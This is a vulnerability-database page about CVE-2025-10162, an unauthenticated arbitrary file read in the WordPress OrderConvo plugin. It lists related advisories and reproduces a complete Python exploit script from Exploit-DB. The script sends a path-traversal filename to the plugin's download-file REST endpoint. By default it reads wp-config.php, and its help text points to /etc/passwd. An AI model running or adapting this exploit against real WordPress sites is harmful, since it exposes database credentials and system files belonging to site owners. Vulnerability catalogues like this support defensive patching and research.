Vulners
Lucene search
📄 WordPress OrderConvo 13.5 Path Traversal
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Exploit for CVE-2025-10162 | 30 May 202622:15 | – | githubexploit |
 | CVE-2025-10162 | 4 May 202603:43 | – | circl |
 | WordPress plugin OrderConvo 安全漏洞 | 7 Oct 202500:00 | – | cnnvd |
 | CVE-2025-10162 | 7 Oct 202506:00 | – | cve |
 | CVE-2025-10162 OrderConvo < 14 - Unauthenticated Arbitrary File Read | 7 Oct 202506:00 | – | cvelist |
 | WordPress OrderConvo 14 - Path Traversal | 1 Jun 202600:00 | – | exploitdb |
 | EUVD-2025-32606 | 7 Oct 202506:00 | – | euvd |
 | WordPress OrderConvo < 14 - Path Traversal | 3 Jun 202606:04 | – | nuclei |
 | CVE-2025-10162 | 7 Oct 202506:15 | – | nvd |
 | WordPress OrderConvo plugin < 14 - Unauthenticated Arbitrary File Read vulnerability | 7 Oct 202512:27 | – | patchstack |
10
# Exploit Title: WordPress OrderConvo 14 - Path Traversal
# Date: 05-31-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.najeebmedia.com/
# Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
# Version: 13.5
# Tested on: Debian
# CVE : CVE-2025-10162
import httpx
import asyncio
import argparse
from urllib.parse import urljoin
import sys
async def main(base_url, file):
async with httpx.AsyncClient(verify=False) as client:
try:
print('[*] Checking connection to target')
req = await client.get(url=base_url)
if req.status_code == 200:
print('[+] The target is alive, exploiting\n')
else:
print(f'[-] Unable to connect to the target. Code: {req.status_code}')
sys.exit()
except:
print(f'[-] Problem with connection to the target.')
sys.exit()
exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
r = await client.get(url=exp_url)
if len(r.text) != 0:
print(r.text)
else:
print("[*] Unable to read file")
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")
parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")
args = parser.parse_args()
if __name__ == '__main__':
asyncio.run(main(args.url, args.filename))Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.39198
SSVC